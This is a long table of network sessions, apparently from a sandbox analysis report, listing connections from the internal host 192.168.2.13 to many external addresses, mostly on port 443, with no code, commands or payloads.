                                    13898192.168.2.135700090.208.91.198443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13899192.168.2.1349160113.177.180.74443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13900192.168.2.1338982150.192.68.101443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13901192.168.2.135127224.9.154.81443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13902192.168.2.1335896216.243.250.71443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13903192.168.2.1347526140.171.201.40443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13904192.168.2.135820072.202.19.114443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13905192.168.2.134679445.255.46.107443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13906192.168.2.1350412175.190.181.89443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13907192.168.2.1335804146.143.154.60443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13908192.168.2.1340198123.246.176.122443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13909192.168.2.1335006171.106.77.165443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13910192.168.2.135775038.81.250.9443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13911192.168.2.135751890.80.92.151443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13912192.168.2.134651635.71.40.26443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13913192.168.2.135599414.112.67.134443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13914192.168.2.133338293.28.112.182443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13915192.168.2.135845082.168.220.232443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13916192.168.2.134199668.68.209.156443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13917192.168.2.134711064.55.162.169443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13918192.168.2.1352964184.163.239.146443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13919192.168.2.1339604150.209.249.121443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13920192.168.2.1335250129.172.31.179443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13921192.168.2.1343918185.243.123.44443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13922192.168.2.135966840.86.238.216443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13923192.168.2.134384077.136.182.54443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13924192.168.2.1339804179.116.86.143443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13925192.168.2.133527818.38.55.210443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13926192.168.2.1333636109.187.115.139443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13927192.168.2.1344288217.70.128.164443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13928192.168.2.1350042145.72.181.7443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13929192.168.2.135793452.222.228.170443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13930192.168.2.1333906219.203.30.200443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13931192.168.2.1347014205.157.74.239443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13932192.168.2.1342820147.166.138.168443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13933192.168.2.1353434217.141.82.228443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13934192.168.2.13556021.12.232.40443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13935192.168.2.133742658.17.96.105443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13936192.168.2.134534674.201.18.136443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13937192.168.2.135906875.11.101.195443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13938192.168.2.135146079.255.221.230443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13939192.168.2.1350678101.78.148.92443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13940192.168.2.1354240212.21.210.130443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13941192.168.2.135621220.250.153.202443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13942192.168.2.1357034124.93.70.182443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13943192.168.2.135944227.1.180.224443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13944192.168.2.134913227.97.81.132443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13945192.168.2.135219281.48.134.133443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13946192.168.2.135756467.143.224.241443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13947192.168.2.1334372147.68.152.82443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13948192.168.2.1351780187.95.19.43443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13949192.168.2.133469447.51.53.138443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13950192.168.2.135874846.171.122.135443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13951192.168.2.1348054106.78.71.254443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13952192.168.2.134715062.139.104.247443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13953192.168.2.1340278154.232.235.52443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13954192.168.2.1344982181.204.12.158443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13955192.168.2.1358652148.22.26.219443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13956192.168.2.1353096182.15.70.122443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13957192.168.2.1343188194.135.192.53443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13958192.168.2.134488867.184.205.69443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13959192.168.2.1359832148.143.180.102443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13960192.168.2.1351776200.185.44.160443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13961192.168.2.1345948211.201.180.234443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13962192.168.2.1334626131.173.113.255443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13963192.168.2.1338482138.43.251.106443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13964192.168.2.1351206223.58.194.151443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13965192.168.2.135604039.8.247.110443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13966192.168.2.135540834.126.51.97443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13967192.168.2.1344914171.231.8.116443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13968192.168.2.1356766106.215.187.176443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13969192.168.2.1357118157.189.221.100443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13970192.168.2.1333276161.17.253.182443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13971192.168.2.1347004198.252.6.137443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13972192.168.2.134369066.250.6.196443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13973192.168.2.1343314144.230.210.142443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13974192.168.2.135666034.4.152.233443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13975192.168.2.1339002205.124.147.166443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13976192.168.2.1356478154.9.123.180443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13977192.168.2.135268277.77.231.237443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13978192.168.2.1354358133.27.171.154443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13979192.168.2.133509040.156.185.7443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13980192.168.2.1358734139.2.198.210443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13981192.168.2.134299417.66.176.10443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13982192.168.2.134905638.25.242.163443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13983192.168.2.1359664220.72.27.183443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13984192.168.2.1347398212.129.94.127443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13985192.168.2.135938495.37.28.139443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13986192.168.2.1358704189.72.131.233443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13987192.168.2.1352176201.19.181.97443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13988192.168.2.133724284.204.69.154443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13989192.168.2.1345050179.94.213.254443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13990192.168.2.1352716158.201.240.202443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13991192.168.2.134539857.11.225.39443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13992192.168.2.133380095.247.7.93443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13993192.168.2.1356784205.90.22.113443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13994192.168.2.1360034172.66.210.1848080
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13995192.168.2.1354576193.167.176.76443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13996192.168.2.1334464169.106.7.63443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13997192.168.2.135873232.146.74.249443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13998192.168.2.134385044.208.214.236443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13999192.168.2.134333883.226.116.179443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14000192.168.2.133784013.116.145.223443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14001192.168.2.1334658135.250.19.232443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14002192.168.2.1343020209.100.157.247443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14003192.168.2.133479665.144.184.206443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14004192.168.2.135670642.53.114.61443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14005192.168.2.13347209.129.229.45443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14006192.168.2.133723819.91.27.65443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14007192.168.2.134091670.166.54.205443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14008192.168.2.1341286149.11.183.15443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14009192.168.2.134286485.20.207.122443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14010192.168.2.135999642.193.42.161443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14011192.168.2.135459038.111.127.94443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14012192.168.2.133794882.16.115.198443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14013192.168.2.1350670179.181.230.75443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14014192.168.2.1340054181.175.207.146443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14015192.168.2.134713818.51.187.87443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14016192.168.2.1335552103.119.115.111443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14017192.168.2.1359592201.15.215.186443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14018192.168.2.135240297.99.217.53443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14019192.168.2.134895032.125.35.251443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14020192.168.2.135972869.203.123.200443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14021192.168.2.1352514124.108.231.233443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14022192.168.2.1349592132.105.211.251443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14023192.168.2.1344398133.45.220.175443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14024192.168.2.133989846.231.30.146443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14025192.168.2.1347738140.251.66.42443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14026192.168.2.133879844.44.244.249443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14027192.168.2.1351584198.186.84.127443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14028192.168.2.13470149.128.103.158443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14029192.168.2.134118093.231.121.160443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14030192.168.2.135742057.224.142.238443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14031192.168.2.133572887.168.254.98443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14032192.168.2.1346926155.69.222.170443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14033192.168.2.135061673.185.151.20443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14034192.168.2.1350370220.81.114.224443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14035192.168.2.135663844.92.50.158443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14036192.168.2.1341900167.139.16.161443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14037192.168.2.1337394217.117.91.130443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14038192.168.2.135241253.191.10.100443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14039192.168.2.1348762167.190.180.205443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14040192.168.2.13566348.198.246.148443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14041192.168.2.1348800116.125.203.237443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14042192.168.2.135335840.210.2.48443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14043192.168.2.1334902181.150.72.137443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14044192.168.2.133721837.117.11.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14045192.168.2.133411077.83.119.223443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14046192.168.2.1339542213.112.247.15443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14047192.168.2.1356658187.171.47.229443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14048192.168.2.133505879.205.88.40443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14049192.168.2.1337752170.69.180.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14050192.168.2.1340950100.177.177.218443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14051192.168.2.1344318220.8.207.195443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14052192.168.2.135908468.252.72.20443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14053192.168.2.1360454172.85.171.97443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14054192.168.2.1336262164.176.249.77443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14055192.168.2.133429682.46.102.202443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14056192.168.2.1357448165.56.227.134443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14057192.168.2.1344910201.108.251.60443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14058192.168.2.135900449.192.158.109443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14059192.168.2.1359628139.181.152.220443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14060192.168.2.1338342161.206.224.11443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14061192.168.2.133370454.64.39.205443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14062192.168.2.133332436.70.216.134443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14063192.168.2.135387870.228.28.159443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14064192.168.2.1353966190.82.170.64443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14065192.168.2.1342572168.138.222.26443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14066192.168.2.1356094205.150.135.21443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14067192.168.2.1358508112.228.223.116443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14068192.168.2.1349254123.29.94.253443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14069192.168.2.1343630136.2.63.235443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14070192.168.2.1333326181.3.199.186443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14071192.168.2.135711663.162.16.189443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14072192.168.2.1356186147.3.233.199443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14073192.168.2.1345522210.88.28.52443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14074192.168.2.134693298.178.186.223443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14075192.168.2.1351716221.26.233.220443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14076192.168.2.1340934149.135.204.123443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14077192.168.2.1347876223.199.69.218443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14078192.168.2.1335044186.136.10.195443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14079192.168.2.134958660.44.91.174443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14080192.168.2.1359806199.46.37.29443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14081192.168.2.1345688210.152.213.161443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14082192.168.2.1360594197.164.124.216443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14083192.168.2.1350462209.5.109.110443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14084192.168.2.134682245.219.65.124443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14085192.168.2.13359322.173.118.219443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14086192.168.2.133570676.165.177.243443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14087192.168.2.1359070102.35.20.200443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14088192.168.2.135019243.192.31.207443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14089192.168.2.134515872.128.18.247443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14090192.168.2.1345604110.160.140.63443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14091192.168.2.135181045.51.118.200443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14092192.168.2.134067664.201.160.205443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14093192.168.2.134891084.148.45.59443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14094192.168.2.135092442.60.12.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14095192.168.2.1343640177.221.199.214443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14096192.168.2.134682413.34.80.112443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14097192.168.2.1343492166.25.178.12443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14098192.168.2.134139689.252.102.143443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14099192.168.2.134425472.174.233.118443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14100192.168.2.1337642171.18.178.86443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14101192.168.2.1339750157.56.26.148443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14102192.168.2.1335952207.152.138.239443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14103192.168.2.1339464145.151.250.153443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14104192.168.2.1343418133.165.223.66443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14105192.168.2.1355022154.49.253.145443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14106192.168.2.133560283.219.205.77443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14107192.168.2.135720242.172.86.68443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14108192.168.2.1347820141.97.139.129443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14109192.168.2.133826051.180.7.139443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14110192.168.2.1332792122.107.28.215443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14111192.168.2.1341730101.201.166.188443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14112192.168.2.135166040.146.47.166443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14113192.168.2.1334256120.158.194.203443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14114192.168.2.1335014137.103.22.120443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14115192.168.2.134654259.74.167.213443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14116192.168.2.133296446.246.38.202443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14117192.168.2.13482342.163.211.238443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14118192.168.2.133344837.174.82.188443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    14119192.168.2.1342292165.103.42.209443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
